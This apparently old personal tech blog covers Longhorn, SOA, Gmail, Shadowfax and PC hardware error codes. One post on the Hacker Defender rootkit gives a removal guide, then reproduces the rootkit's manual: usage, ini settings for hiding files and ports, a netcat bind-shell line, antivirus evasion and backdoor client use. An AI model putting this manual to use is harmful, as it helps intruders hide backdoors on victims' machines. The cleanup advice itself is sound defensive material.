Longhorn M7.2 Bits

Longhorn Milestone 7.2 (M7.2) bits were handed out at WinHEC. Per Chris sells, the MSDN subscribes should be seeing this soon. You can check out some of the reviews from the WinHEC participants here.

I am now rubbing my hands gleefully and eager to get my hands on it – have to wait for it to show up on the subscriber download at MSDN – will need a new HDD then :). Lets see if my small demos for Tiles survives or not – the PDC build, I run out of memory and finally have to reboot.

What is a Loosely Coupled System?

In a loosely coupled system (e.g. Service Oriented Architecture i.e. SOA), the dependencies can be either a Real Dependency or an Artificial Dependency.

Real dependencies are the services that you need to fulfil your need, this is something that cannot be eliminated or reduced.

Artificial dependency on the other hand are the features you need to adhere to in order to consume the services you need. Typically these fall in the categories of platform dependencies, API dependencies, language, etc. Although artificial dependencies cannot be eliminated it can be reduced.

A loosely coupled application is on that minimise its Artificial Dependency.

Visual Basic at the Movies

Quite funny check it out if you got the time. 🙂 If you rate the movie, you can get a FREE copy of Visual Basic.NET

Hacker Defender

A friend’s (Phil Kerkel) laptop recently got infected with HackerDefender which cost him about a day’s worth of work. Now this seems to be harmless, but something like this invading the system is scary, especially when you have all your data and not to mention in most cases a lot of our client’s data!

Basically, these guys use the FTP services installed on Windows machines running on high speed networks (such as DSL/Cable, or University campuses) to they can use that fat pipe to distribute copyrighted material such as films, games and software etc. Sometimes these ftp servers are protected by a piece of software called HackerDefender, this software is used to hide files, processes and even ports from the user and investigating parties and is particularly difficult to infiltrate.

Detecting ItIf a remote port scan says that a port is open and that port can be ftp’d into but aports (http://bagpuss.swan.ac.uk/comms/aports.exe) does not display the port locally you can pretty much assume a version of HackerDefender is installed.

How to Clean It:

Boot windows into Rescue mode, do one of the following:

Insert the Windows OS Installation CD into the Drive.

  • Boot from the CD
  • Choose ‘R’ to enter the Rescue Console
  • Choose the Windows installation you want to Clean from the list presented to you.
  • Enter the Administrator Password.

Once in the recovery console, you have a few commands for this, including:

listsvc    – lists services that can be enabled or disabled

enable   – enables a service, with a service type,

  • SERVICE_DISABLED
  • SERVICE_BOOT_START
  • SERVICE_SYSTEM_START
  • SERVICE_AUTO_START
  • SERVICE_DEMAND

disable – disables a service, but prints out the previous

start-type, which should be recorded in case you need to re-enable the service.

Clean up Trojans/payloads protected by HackerDefender:

Once the machine has rebooted search the registry for the name of the service that you disabled in the previous section, this should lead you to the executable for HackerDefender and more importantly it’s .ini file (not necessarily a .ini file, but may have a different extension)

Open/Edit the ini file and in there you should find a number of files, ports and services that HackerDefender is defending.  Systematically find each of these services in the registry and delete them (they will probably appear more than once), likewise find all of the referenced files and delete them also.

It’s also worth having a look in the registry for ‘run on boot’ programs too, goto this key…HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

Have a look for any of these and delete them if they are present…

  • “spoolsvr.exe”=-
  • “Kernel32″=-
  • “GLSetIT32″=-
  • “iTouch.exe”=-
  • “Localsys.exe”=-
  • “explorer.exe”=-
  • “msiexe.exe”=-
  • “service”=-

Here is the .ini file from Phil (he was Win2K running), as you scan this you will see more things you should look out for:

[Hidden Table]
inatjoy.dll
motkrtin.dll
witadr.dll
winunins.exe
winunins.ini
svhost.exe
CWShredder*
HijackThis*
ProceXP*
Spybot*
msconfig*

[Root Processes]
svhost.exe
trj4j6js.exe
winunins.exe

[Hidden Services]
HackerDefender*

[Hidden RegKeys]
HackerDefender100
LEGACY_HACKERDEFENDER100
HackerDefenderDrv100
LEGACY_HACKERDEFENDERDRV100

[Hidden RegValues]

[Startup Run]
C:\WINNT\svhost.exe -sr -0

[Free Space]

[Hidden Ports]

[Settings]
Password=qweqwe
BackdoorShell=ddd.exe
FileMappingName=_.-=[PokuS]=-._
ServiceName=HackerDefender100
ServiceDisplayName=Windows System Uninstaller
ServiceDescription=Microsoft System Service
DriverName=HackerDefenderDrv100
DriverFileName=hxdefdrv.sys

[Comments]

The COOL Stuff:

Now, this is the cool part. I found this from another site and don’t want to link to them because who knows they they are running, so this is essentially a copy and paste from them! This is basically how the Trojan works, and it is showing what exploits it used, what API’s and how you can “improve on it“. A very interesting read, but I would recommend not using any of this for other than your own learning!

Essentially everything below is copy and paste with very minor edits:

=====[ 2. Introduction ]=====================================

Hacker defender (hxdef) is rootkit for Windows NT 4.0, Windows 2000 and Windows XP, it may also work on latest NT based systems. Main code is written in Delphi 6. New functions are written in assembler. Driver code is written in C. Backdoor and redirector clients are coded mostly in Delphi 6.

program uses adapted LDE32
LDE32, Length-Disassembler Engine, 32-bit, (x) 1999-2000 Z0MBiE
special edition for REVERT tool
version 1.05

program uses Superfast/Supertiny Compression/Encryption library
Superfast/Supertiny Compression/Encryption library.
(c) 1998 by Jacky Qwerty/29A.

=====[ 2.1 Idea ]=====================================

The main idea of this program is to rewrite few memory segments in all running processes. Rewriting of some basic modules cause changes in processes behaviour. Rewriting must not affect the stability of the system or running processes. 

Program must be absolutely hidden for all others. Now the user is able to hide files, processes, system services, system drivers, registry keys and values, open ports, cheat with free disk space. Program also masks its changes  in memory and hiddes handles of hidden processes. Program installs hidden backdoors, register as hidden system service and installs hidden system driver. The technology of backdoor allowed to do the implantation of redirector.

=====[ 2.2 Licence ]=====================================

 This project in version 1.0.0 is open source.

 And of course authors are not responsible for what you’re doing with  Hacker defender.

=====[ 3. Usage ]=====================================

 Usage of hxdef is quite simple:

 >hxdef100.exe [inifile]
or
 >hxdef100.exe [switch]

Default name for inifile is EXENAME.ini where EXENAME is the name of executable of main program without extension. This is used if you run hxdef without specifying the inifile or if you run it with switch (so default inifile is hxdef100.ini).

 These switches are available:

 -:installonly – only install service, but not run
 -:refresh – use to update settings from inifile
 -:noservice – doesn’t install services and run normally
 -:uninstall – removes hxdef from the memory and kills all
    running backdoor connections
    stopping hxdef service does the same now

Example:
 >;hxdef100.exe -:refresh

Hxdef with its default inifile is ready to run without any change in inifile. But it’s highly recommended to create your own settings. See Inifile section for more information about inifile.

Switches -:refresh and -:uninstall can be called only from original exefile. This mean you have to know the name and path of running hxdef exefile to change settings or to uninstall it.

=====[ 4. Inifile ]=====================================

Inifile must contain nine parts: [Hidden Table], [Root Processes], [Hidden Services], [Hidden RegKeys], [Hidden RegValues], [Startup Run], [Free Space], [Hidden Ports] and [Settings].  In [Hidden Table], [Root Processes], [Hidden Services] a [Hidden RegValues] can be used character * as the wildcard in place of strings end.

Asterisk can be used only on strings end, everything after first asterisks is ignored. All spaces before first and after last another string characters are ignored.

Example:
[Hidden Table]
hxdef*

this will hide all files, dirs and processes which name start with “hxdef”.

Hidden Table is a list of files, directories and processes which should be hidden. All files and directories in this list will disappear from file managers. Programs in this list will be hidden in tasklist. Make sure main
file, inifile, your backdoor file and driver file are mentioned in this list.

Root Processes is a list of programs which will be immune against infection. You can see hidden files, directories and programs only with these root programs. So, root processes are for rootkit admins. To be mentioned in Root Processes doesn’t mean you’re hidden. It is possible to have root process which is not hidden and vice versa.

Hidden Services is a list of service and driver names which will be hidden in the database of installed services and drivers. Service name for the main rootkit program is HackerDefender100 as default, driver name for the main rootkit driver is HackerDefenderDrv100. Both can be changed in the inifile.

Hidden RegKeys is a list of registry keys which will be hidden. Rootkit has four keys in registry: HackerDefender100, LEGACY_HACKERDEFENDER100, HackerDefenderDrv100, LEGACY_HACKERDEFENDERDRV100 as default. If you rename service name or driver name you should also change this list.

First two registry keys for service and driver are the same as its name. Next two are LEGACY_NAME. For example if you change your service name to BoomThisIsMySvc your registry entry will be LEGACY_BOOMTHISISMYSVC.

Hidden RegValues is a list of registry values which will be hidden.

Startup Run is a list of programs which rootkit run after its startup. These programs will have same rights as rootkit. Program name is divided from its arguments with question tag. Do not use ” characters. Programs will terminate after user logon. Use common and well known methods for starting programs after user logon. You can use following shortcuts here:
 %cmd%  – stands for system shell exacutable + path
     (e.g. C:\winnt\system32\cmd.exe)
 %cmddir% – stands for system shell executable directory
     (e.g. C:\winnt\system32\)
 %sysdir% – stands for system directory
     (e.g. C:\winnt\system32\)
 %windir% – stands for Windows directory
     (e.g. C:\winnt\)
 %tmpdir% – stands for temporary directory
     (e.g. C:\winnt\temp\)

Example:
1)
[Startup Run]
c:\sys\nc.exe?-L -p 100 -t -e cmd.exe

netcat-shell is run after rootkit startup and listens on port 100

2)
[Startup Run]
%cmd%?/c echo Rootkit started at %TIME%>> %tmpdir%starttime.txt

this will put a time stamp to temporary_directory\starttime.txt (e.g. C:\winnt\temp\starttime.txt) everytime rootkit starts(%TIME% works only with Windows 2000 and higher)

Free Space is a list of harddrives and a number of bytes you want to add to a free space. The list item format is X:NUM where X stands for the drive letter and NUM is the number of bytes that will be added to its number of free bytes.

Example:
[Free Space]
C:123456789

this will add about 123 MB more to shown free disk space of disk C

Hidden Ports is a list of open ports that you want to hide from applications like OpPorts, FPort, Active Ports, Tcp View etc. It has at most 2 lines. First line format is TCP:tppport1, tcpport2, tcpport3 …, second line format is UDP:udpport1,udpport2,udpport3 …

Example:
1)
[Hidden Ports]
TCP:8080,456

this will hide two ports: 8080/TCP and 456/TCP

2)
[Hidden Ports]
TCP:8001
UDP:12345

this will hide two ports: 8001/TCP and 12345/UDP

3)
[Hidden Ports]
TCP:
UDP:53,54,55,56,800

this will hide five ports: 53/UDP, 54/UDP, 55/UDP, 56/UDP and 800/UDP

Settings contains eigth values:Password, BackdoorShell, FileMappingName, ServiceName, ServiceDisplayName, ServiceDescription, DriverName and DriverFileName.

Password which is 16 character string used when working with backdoor or redirector. Password can be shorter, rest is filled with spaces.

BackdoorShell is name for file copy of the system shell which is created by backdoor in temporary directory.

FileMappingName is the name of shared memory where the settings for hooked processes are stored. 

ServiceName is the name of rootkit service. ServiceDisplayName is display name for rootkit service. 

ServiceDescription is description for rootkit service. DriverName is the name for hxdef driver. 

DriverFileName is the name for hxdef driver file.

Example:
[Settings]
Password=hxdef-rulez
BackdoorShell=hxdefá$.exe
FileMappingName=_.-=[Hacker Defender]=-._
ServiceName=HackerDefender100
ServiceDisplayName=HXD Service 100
ServiceDescription=powerful NT rootkit
DriverName=HackerDefenderDrv100
DriverFileName=hxdefdrv.sys
 
This mean your backdoor password is “hxdef-rulez”, backdoor will copy system shell file (usually cmd.exe) to “hxdefá$.exe” to temp. Name of shared memory will be “_.-=[Hacker Defender]=-._”. Name of a service is “HackerDefender100”, its display name is “HXD Service 100”, its description is “poweful NT rootkit”.
Name of a driver is “HackerDefenderDrv100”. Driver will be stored in a file called “hxdefdrv.sys”.

Extra characters |, <, >, :, \, / and ” are ignored on all lines except [Startup Run], [Free Space] and [Hidden Ports] items and values in [Settings] after first = character. Using extra characters you can make your inifile immune from antivirus systems.

Example:
[H<<<idden T>>a/”ble]
>h”xdef”*

is the same as

[Hidden Table]
hxdef*

see hxdef100.ini and hxdef100.2.ini for more examples

All strings in inifile except those in Settings and Startup Run are case insensitive.

=====[ 5. Backdoor ]=====================================

Rootkit hooks some API functions connected with receiving packets from the net. If incoming data equals to 256 bits long key, password and service are verified, the copy of a shell is created in a temp, its
instance is created and next incoming data are redirected to this shell.

Because rootkit hooks all process in the system all TCP ports on all servers will be backdoors. For example, if the target has port 80/TCP open for HTTP, then this port will also be available as a backdoor. Exception here is for ports opened by System process which is not hooked. This backdoor will
works only on servers where incoming buffer is larger or equal to 256 bits. But this feature is on almost all standard servers like Apache, IIS, Oracle.

Backdoor is hidden because its packets go through common servers on the system. So, you are not able to find it with classic portscanner and this backdoor can easily go through firewall. Exception in this are classic proxies which are protocol oriented for e.g. FTP or HTTP.

During tests on IIS services was found that HTTP server does not log any of this connection, FTP and SMTP servers log only disconnection at the end. So, if you run hxdef on server with IIS web server, the HTTP port is probably the best port for backdoor connection on this machine.

You have to use special client if want to connect to the backdoor. Program bdcli100.exe is used for this.

Usage: bdcli100.exe host port password

Example:
 >bdcli100.exe
www.windowsserver.com 80 hxdef-rulez

this will connect to the backdoor if you rooted www.windowsserver.com before and left default hxdef password.

Client for version 1.0.0 is not compatible with servers in older version.

=====[ 5.1 Redirector ]=====================================

Redirector is based on backdoor technology. First connection packets are same as in backdoor connection. That mean you use same ports as for backdoor. Next packets are special packets for redirector only. These packets are made by redirectors base which is run on users computer. First packet of redirected connection defines target server and port.

The redirectors base saves its settings into its inifile which name depends on base exefile name (so default is rdrbs100.ini). If this file doesn’t exist when base is run, it is created automatically. It is better not to modify this inifile externaly. All settings can be changed from base console.

If we want to use redirector on server where rootkit is installed, we have to run redirectors base on localhost before. Then in base console we have to create mapped port routed to server with hxdef. Finally we can connect on localhost base on chosen port and transfering data. Redirected data are
coded with rootkit password. In this version connection speed is limited with about 256 kBps. Redirector is not determined to be used for hispeed connections in this version. Redirector is also limited with system where rootkit run. Redirector works with TCP protocol only.

In this version the base is controled with 19 commands. These are not case sensitive. Their function is described in HELP command. During the base startup are executed commands in startup-list. Startup-list commands are edited with commands which start with SU.

Redirector differentiate between two connection types (HTTP and other). If connection is other type packets are not changed. If it is HTTP type Host parametr in HTTP header is changed to the target server. Maximum redirectors count on one base is 1000.

Redirector base fully works only on NT boxes. Only on NT program has tray icon and you can hide console with HIDE command. Only on NT base can be run in silent mode where it has no output, no icon and it does only commands in startup-list.

Examples:
1) getting mapped port info

 >MPINFO
 No mapped ports in the list.

2) add command MPINFO to startup-list and get startup-list commands:

 >SUADD MPINFO
 >sulist
 0) MPINFO

3) using of HELP command:

 >HELP
 Type HELP COMMAND for command details.
 Valid commands are:
 HELP, EXIT, CLS, SAVE, LIST, OPEN, CLOSE, HIDE, MPINFO, ADD, DEL,
 DETAIL, SULIST, SUADD, SUDEL, SILENT, EDIT, SUEDIT, TEST
 >HELP ADD
 Create mapped port. You have to specify domain when using HTTP type.
 usage: ADD <LOCAL PORT> <MAPPING SERVER> <MAPPING SERVER PORT> <TARGET
 SERVER> <TARGET SERVER PORT> <PASSWORD> [TYPE] [DOMAIN]
 >HELP EXIT
 Kill this application. Use DIS flag to discard unsaved data.
 usage: EXIT [DIS]

4) add mapped port, we want to listen on localhost on port 100, rootkit is installed on server 200.100.2.36 on port 80, target server is www.google.com on port 80, rootkits password is bIgpWd, connection type is HTTP, ip address of target server (www.google.com) – we always have to know its ip – is 216.239.53.100:

 >ADD 100 200.100.2.36 80 216.239.53.100 80 bIgpWd HTTP www.google.com

command ADD can be run without parameters, in this case we are asked for every parameter separately

5) now we can check mapped ports again with MPINFO:
 
 >MPINFO
 There are 1 mapped ports in the list. Currently 0 of them open.

6) enumeration of mapped port list:

 >LIST
 000) :100:200.100.2.36:80:216.239.53.100:80:bIgpWd:HTTP

7) datailed description of one mapped port:
 
 >DETAIL 0
 Listening on port: 100
 Mapping server address: 200.100.2.36
 Mapping server port: 80
 Target server address: 216.239.53.100
 Target server port: 80
 Password: bIgpWd
 Port type: HTTP
 Domain name for HTTP Host:
www.google.com
 Current state: CLOSED

8) we can test whether the rootkit is installed with out password on mapping
server 200.100.2.36 (but this is not needed if we are sure about it):

 >TEST 0
 Testing 0) 200.100.2.36:80:bIgpWd – OK

if test failed it returns
 
 Testing 0) 200.100.2.36:80:bIgpWd – FAILED

9) port is still closed and before we can use it, we have to open it with OPEN command, we can close port with CLOSE command when it is open, we can use flag ALL when want to apply these commands on all ports in the list, current state after required action is written after a while:
 
 >OPEN 0
 Port number 0 opened.
 >CLOSE 0
 Port number 0 closed.

or

 >OPEN ALL
 Port number 0 opened.
 
10) to save current settings and lists we can use SAVE command, this saves all to inifile (saving is also done by command EXIT without DIS flag):
 
 >SAVE
 Saved successfully.

Open port is all what we need for data transfer. Now you can open your favourite explorer and type http://localhost:100/ as url. If no problems you will see how main page on www.google.com is loaded.

First packets of connection can be delayed up to 5 seconds, but others are limited only by speed of server, your internet connection speed and by redirector technology which is about 256 kBps in this version.

=====[ 6.2 Hooked API ]=====================================

List of API functions which are hooked:

Kernel32.ReadFile
Ntdll.NtQuerySystemInformation (class 5 a 16)
Ntdll.NtQueryDirectoryFile
Ntdll.NtVdmControl
Ntdll.NtResumeThread
Ntdll.NtEnumerateKey
Ntdll.NtEnumerateValueKey
Ntdll.NtReadVirtualMemory
Ntdll.NtQueryVolumeInformationFile
Ntdll.NtDeviceIoControlFile
Ntdll.NtLdrLoadDll
Ntdll.NtOpenProcess
Ntdll.NtCreateFile
Ntdll.NtLdrInitializeThunk
WS2_32.recv
WS2_32.WSARecv
Advapi32.EnumServiceGroupW
Advapi32.EnumServicesStatusExW
Advapi32.EnumServicesStatusExA
Advapi32.EnumServicesStatusA

Clippy

If you have had enough of Clippy, check this out. Not suitable for those with an aversion to profanity!

India's secret army of online ad 'clickers'

Now this probably has to fall in the News of the Weird category, I would probably have fallen asleep, drooling on the computer, which would have caused something to short circuit and then blow up the machine, and eventually get the house on fire. Hence, not work losing your house over this.

Living La Vida Longhorn

You probably already heard this, but Chris Sells has a new column on MSDN called Longhorn Foghorn, that describes each of the “Pillars of Longhorn” – this is something which IMHO developers would understand and appreicate. In the first article he explains the “Pillars” and then in the next two goes onto build Solitaire. You can download the sample and play with it too.

Date/Time Issue with gmail

Karan found this and you can read about all of it in his blog. But I checked and he is right! Gmail does not show me the time of the “origin” of the email only when gmail got it. So taking Karan’s scenario:

  1. Retrieve from external pop3 mailbox
  2. 250 new messages
  3. Import 250 Messages
  4. look at inbox, and you have 250 messages received at the same time (1 min ago)
  5. Oh wow! this is just what I need.

This begs the question, is this by design? If so, would it be to thwart the spammers? Personally I would like to see both when was the mail sent, and when did I get it.

Thoughts?

Shadowfax

Shadowfax is an interesting set of “Reference Solution” that is being worked on by the PAG group at Microsoft. I think this would be a very important piece in the whole SOA (Service Oriented Architecture) space, with getting bits out the door in a quick and reusable fashion. Basically this is a similar implementation of Indigo in todays technologies (i.e. those that are currently shipping such as .NET). This “unifies” the four messaging options you have today:

  1. Web Services
  2. Remoting
  3. MSMQ
  4. DCOM

Per Microsoft here are the goals for this are:

  1. Enable separation between stable service interfaces and possibly volatile and unreliable Service Dispatching (Without the framework one would have to think about how to expose the service first. With the framework one can build a service first and then think about how to expose it.)
  2. Make it possible for developers to keep aspect-like logic, for example monitoring or auditing logic, separate from Service Dispatching logic.
  3. Provide a single, consistent mode of handling service requests regardless of the transport transport on which they came.
  4. Help developers build robust services that can be accessed by client applications through multiple transports.

This is how is translates to Architecture speak:

  1. Provide support for sending service request and receiving service responses over multiple transports (such as Web Services or message queue transport)
  2. Provide multiple, configurable means of dispatching Service Dispatchings.
  3. Provide multiple, configurable means of passing requests to and receiving responses form Service Dispatchings.
  4. Provide configurable means of “inserting” aspect-like logic into request and response flow.
  5. Provide simple means of integration with BizTalk orchestration

And the constraints within which this has to operate are:

  • The architecture must be logically consistent with the future direction of relevant Microsoft products (Indigo and BizTalk in particular).
  • The implementation should use the .NET Framework.  To be deployed, the architecture must only require the Windows platform with the .NET Framework distributable installed.
  • The development and modifications of the framework should be done with VS 2003 Enterprise Version.

Again, I think this would be quite a significant advantage before Indigo ships. I just started playing with this, so look out for more details on this in the next few weeks.

Hardware Error Codes

I suddenly started getting an error during boot up on one of my machine and could not figure out what it was, after spending a fair amount of time on google, I found this listing of error codes that I feel was very helpful. You can bookmark this post and use it as your reference.

Code  Description
01x   Undetermined problem errors
02x   Power supply errors

1xx     System Board Errors
   101  System board error – Interrupt failure
   102  System board error – Timer failure
   103  System board error – Timer interrupt failure
   104  System board error – Protected mode failure
   105  System board error – Last 8042 command not accepted
   106  System board error – Converting logic test
   107  System board error – Hot NMI test
   108  System board error – Timer bus test
   109  Direct memory access test error
   110  System board memory
   111  Adapter memory
   112  (any adapter in system unit)
   113  (any adapter in system unit)
   121  Unexpected hardware interrupts occurred
   131  Cassette wrap test failed
   151  System Board Error; Defective battery
   152  System Board Error; Real time clock failure
   161  System Options Error – (Run SETUP) Battery failure
   162  System options not set correctly-(Run SETUP)
   163  Time and date not set – (Run SETUP)
   164  Memory size error – (Run SETUP)
   165  System options not set – (Run SETUP)
   166  (any adapter in system unit)
   199  User-indicated configuration not correct

2xx    Memory (RAM) Errors
xxyyyy yyzz 201 bad ram chip in bank xx row zz

   201  Memory test failed
   202  Memory address error
   203  Memory address error
   215  (system board memory failure)
   216  (system board memory failure)

3xx    Keyboard Errors

   301  Keyboard did not respond to software reset correctly, or a stuck key failure was detected. If a stuck key was detected, the scan code for the key is displayed in hexadecimal. For example, the error code 49 301 indicates that Key 73, the PAGE UP key, has failed (49 hex = 73 decimal)

   302  User-indicated error from the keyboard test, or AT keylock is locked
   303  Keyboard or system unit error
   304  Keyboard or system unit error; CMOS does not match system
   305  Models 50 and 60 fuse or keyboard cable error
   341  Replace keyboard
   342  Replace interface cable
   343  Replace enhancement card or cable

4xx    Monochrome Monitor Errors
   401  Monochrome memory test, horizontal synchronous frequency test, or video test failed
   408  User-indicated display attributes failure
   416  User-indicated character set failure
   424  User-indicated 80 X 25 mode failure
   432  Parallel port test failed (monochrome adapter)

5xx    Color Monitor Errors
   501  Color memory test failed, horizontal synchronous frequency test, or video test failed
   508  User-indicated display attribute failure
   516  User-indicated character set failure
   524  User-indicated 80 X 25 mode failure
   532  User-indicated 40 X 25 mode failure
   540  User-indicated 320 X 200 graphics mode failure
   548  User-indicated 640 X 200 graphics mode failure

6xx    Floppy Disk Drive Errors
   601  Disk power-on diagnostics test failed
   602  Disk test failed; boot record is not valid
   603  Disk size error
   606  Disk verify function failed
   607  Write-protected disk
   608  Bad command disk status returned
   610  Disk initialization failed
   611  Timeout – disk status returned
   612  Bad NEC (controller) – disk status returned
   613  Bad DMA – disk status returned
   614  DMA Boundary error
   621  Bad seek – disk status returned
   622  Bad CRC – disk status returned
   623  Record not found – disk status returned
   624  Bad address mark – disk status returned
   625  Bad NEC (controller) seek – disk status returned
   626  Disk data compare error
   627  Disk change line error
   628  Disk removed

7xx    8087 or 80287 Math Coprocessor Errors
   701  Math coprocessor test failed

9xx    Parallel Printer Adapter Errors
   901  Parallel printer adapter test failed

10xx    Reserved for Parallel Printer Adapter
  1001  Alt printer Adapter test failed

11xx   Asynchronous Communications Adapter Errors
  1101 Asynchronous communications adapter test failed
  1102 Any serial device (system board)
  1106 Any serial device (system board)
  1107 Communications cable (system board)
  1108 Any serial device (system board)
  1109 Any serial device (system board)
  1110 Modem status register not clear
  1111 Ring indicate failure
  1112 Trailing edge ring indicate failure
  1113 Receive and delta receive line signal detect failure
  1114 Receive line signal detect failure
  1115 Delta receive line signal detect failure
  1116 Line control register; all bits cannot be set
  1117 Line control register; all bits cannot be reset
  1118 Xmit holding and/or shift register is stuck on
  1119 Data ready stuck on
  1120 Interrupt enable register, all bits cannot be set
  1121 Interrupt enable register, all bits cannot be reset
  1122 Interrupt pending stuck on
  1123 Interrupt ID register stuck on
  1124 Modem control register, all bits cannot be set
  1125 Modem control register, all bits cannot be reset
  1126 Modem status register, all bits cannot be set
  1127 Modem status register, all bits cannot be reset
  1128 Interrupt ID failure
  1129 Cannot force overrun error
  1130 No modem status interrupt
  1131 Invalid interrupt pending
  1132 No data ready
  1133 No data available interrupt
  1134 No transmit holding interrupt
  1135 No interrupts
  1136 No received line status interrupt
  1137 No receive data available
  1138 Transmit holding register not empty
  1139 No modem status interrupt
  1140 Transmit holding register not empty
  1141 No interrupts
  1142 No IRQ4 interrupt
  1143 No IRQ3 interrupt
  1144 No data transferred
  1145 Maximum BAUD rate failed
  1146 Minimum BAUD rate failed
  1148 Timeout error
  1149 Invalid data returned
  1150 Modem status register error
  1151 No DSR and Delta DSR
  1152 No data set ready
  1153 No delta
  1154 Modem status register not clear
  1155 No CTS and Delta CTS
  1156 No clear to send
  1157 No delta CTS

12xx   Alternate Asynchronous Communications Adapter Errors
  1201 Alternate asynchronous communications adapter test failed
  1202 Dual Asynchronous Adapter/A (Any serial device)
  1206 Dual Asynchronous Adapter/A (Any serial device)
  1207 Dual Asynchronous Adapter/A board error
  1208 Dual Asynchronous Adapter/A (Any serial device)
  1209 Dual Asynchronous Adapter/A (Any serial device)

13xx   Game Control Adapter Errors
  1301 Game control adapter test failed
  1302 Joystick test failed

14xx   Printer Errors
  1401 Printer test failed
  1404 Matrix printer failed

15xx   Synchronous Data Link Control (SDLC) Communications Adapter Errors
  1510 8255 Port B failure
  1511 8255 Port A failure
  1512 8255 Port C failure
  1513 8253 Timer 1 did not reach terminal count
  1514 8253 Timer 1 stuck on
  1515 8253 Timer 0 did not reach terminal count
  1516 8253 Timer 0 stuck on
  1517 8253 Timer 2 did not reach terminal count
  1518 8253 Timer 2 stuck on
  1519 8273 Port B error
  1520 8273 Port A error
  1521 8273 command/read timeout
  1522 Interrupt level 4 failure
  1523 Ring Indicate stuck on
  1524 Receive clock stuck on
  1525 Transmit clock stuck on
  1526 Test indicate stuck on
  1527 Ring indicate not on
  1528 Receive clock not on
  1529 Transmit clock not on
  1530 Test indicate not on
  1531 Data set ready not on
  1532 Carrier detect not on
  1533 Clear to send not on
  1534 Data set ready stuck on
  1536 Clear to send stuck on
  1537 Level 3 interrupt failure
  1538 Receive interrupt results error
  1539 Wrap data miscompare
  1540 DMA channel 1 error
  1541 DMA channel 1 error
  1542 Error in 8273 error checking or status reporting
  1547 Stray interrupt level 4
  1548 Stray interrupt level 3
  1549 Interrupt presentation sequence timeout

16xx   Display Emulation Errors (327x, 5520, 525x)

17xx   Fixed Disk Errors
The following is a listing of Personal Computer AT Error Codes for the fixed disk drive and fixed disk drive adapter:

  1700 Fixed Disk/Adapter
  1701 HDD Controller Failure
  1702 Time out error
  1703 Seek error
  1704 Disk adapter error
  1705 No record found
  1706 Write fault error
  1707 Track 0 error
  1708 Head select error
  1709 Defective ECC
  1710 Read buffer overrun
  1711 Bad address mark
  1712 Error-cause not determined
  1713 Data compare error
  1714 Drive not ready
  1780 Disk 0 failure
  1781 Disk 1 failure
  1782 Disk adapter error
  1790 Disk 0 error
  1791 Disk 1 error

18xx   I/O Expansion Unit Errors
  1801 I/O expansion unit POST error
  1810 Enable/Disable failure
  1811 Extender card warp test failed (disabled)
  1812 High order address lines failure (disabled)
  1813 Wait state failure (disabled)
  1814 Enable/Disable could not be set on
  1815 Wait state failure (disabled)
  1816 Extender card warp test failed (enabled)
  1817 High order address lines failure (enabled)
  1818 Disable not functioning
  1819 Wait request switch not set correctly
  1820 Receiver card wrap test failure
  1821 Receiver high order address lines failure

19xx   3270 PC Attachment Card Errors

20xx   Binary Synchronous Communications (BSC) Adapter Errors
  2010 8255 Port A failure
  2011 8255 Port B failure
  2012 8255 Port C failure
  2013 8253 Timer 1 did not reach terminal count
  2014 8253 Timer 1 stuck on
  2016 8253 Timer 2 did not reach terminal count, or timer 2 stuck on
  2017 8251 Data set ready failed to come on
  2018 8251 Clear to send not sensed
  2019 8251 Data set ready stuck on
  2020 8251 Clear to send stuck on
  2021 8251 Hardware reset failed
  2022 8251 Software reset failed
  2023 8251 Software “error reset” failed
  2024 8251 Transmit ready did not come on
  2025 8251 Receive ready did not come on
  2026 8251 Could not force “overrun” error status
  2027 Interrupt failure – no timer interrupt
  2028 Interrupt failure – transmit, replace card or planar
  2029 Interrupt failure – transmit, replace card
  2030 Interrupt failure – receive, replace card or planar
  2031 Interrupt failure – receive, replace card
  2033 Ring indicate stuck on
  2034 Receive clock stuck on
  2035 Transmit clock stuck on
  2036 Test indicate stuck on
  2037 Ring indicate stuck on
  2038 Receive clock not on
  2039 Transmit clock not on
  2040 Test indicate not on
  2041 Data set ready not on
  2042 Carrier detect not on
  2043 Clear to send not on
  2044 Data set ready stuck on
  2045 Carrier detect stuck on
  2046 Clear to send stuck on
  2047 Unexpected transmit interrupt
  2048 Unexpected receive interrupt
  2049 Transmit data did not equal receive data
  2050 8251 detected overrun error
  2051 Lost data set ready during data wrap
  2052 Receive timeout during data wrap

21xx   Alternate Binary Synchronous Communications Adapter Errors
  2110 8255 Port A failure
  2111 8255 Port B failure
  2112 8255 Port C failure
  2113 8253 Timer 1 did not reach terminal count
  2114 8253 Timer 1 stuck on
  2115 8253 Timer 2 did not reach terminal count, or timer 2 stuck on
  2116 8251 Data set ready failed to come on
  2117 8251 Clear to send not sensed
  2118 8251 Data set ready stuck on
  2119 8251 Clear to send stuck on
  2120 8251 Hardware reset failed
  2121 8251 Software reset failed
  2122 8251 Software “error reset” failed
  2123 8251 Transmit ready did not come on
  2124 8251 Receive ready did not come on
  2125 8251 Could not force “overrun” error status
  2126 Interrupt failure – no timer interrupt
  2128 Interrupt failure – transmit, replace card or planar
  2129 Interrupt failure – transmit, replace card
  2130 Interrupt failure – receive, replace card or planar
  2131 Interrupt failure – receive, replace card
  2133 Ring indicate stuck on
  2134 Receive clock stuck on
  2135 Transmit clock stuck on
  2136 Test indicate stuck on
  2137 Ring indicate stuck on
  2138 Receive clock not on
  2139 Transmit clock not on
  2140 Test indicate not on
  2141 Data set ready not on
  2142 Carrier detect not on
  2143 Clear to send not on
  2144 Data set ready stuck on
  2145 Carrier detect stuck on
  2146 Clear to send stuck on
  2147 Unexpected transmit interrupt
  2148 Unexpected receive interrupt
  2149 Transmit data did not equal receive data
  2150 8251 detected overrun error
  2151 Lost data set ready during data wrap
  2152 Receive timeout during data wrap

22xx   Cluster Adapter Errors

24xx   Enhanced Graphics Adapter Errors

26xx   XT/370 Error Codes

27xx   XT/370 Error Codes

29xx   Color Matrix Printer Errors
  2901
  2902
  2904

30xx   Primary PC Network Adapter Errors
  3001 CPU Failure
  3002 ROM Failure
  3003 ID Failure
  3004 RAM Failure
  3005 HIC Failure
  3006 +/- 12v Failed
  3007 Digital Loopback Failure
  3008 Host Detected HIC Failure
  3009 Synchronous Fail & No Go Bit
  3010 HIC Test OK & No Go Bit
  3011 Go Bit & No CMD 41
  3012 Card not present
  3013 Digital Failure ( Fall Through )
  3015 Analog Failure
  3041 Hot Carrier (not this card)
  3042 Hot Carrier (This Card)

31xx   Secondary PC Network Adapter Errors
  3101 CPU Failure
  3102 ROM Failure
  3103 ID Failure
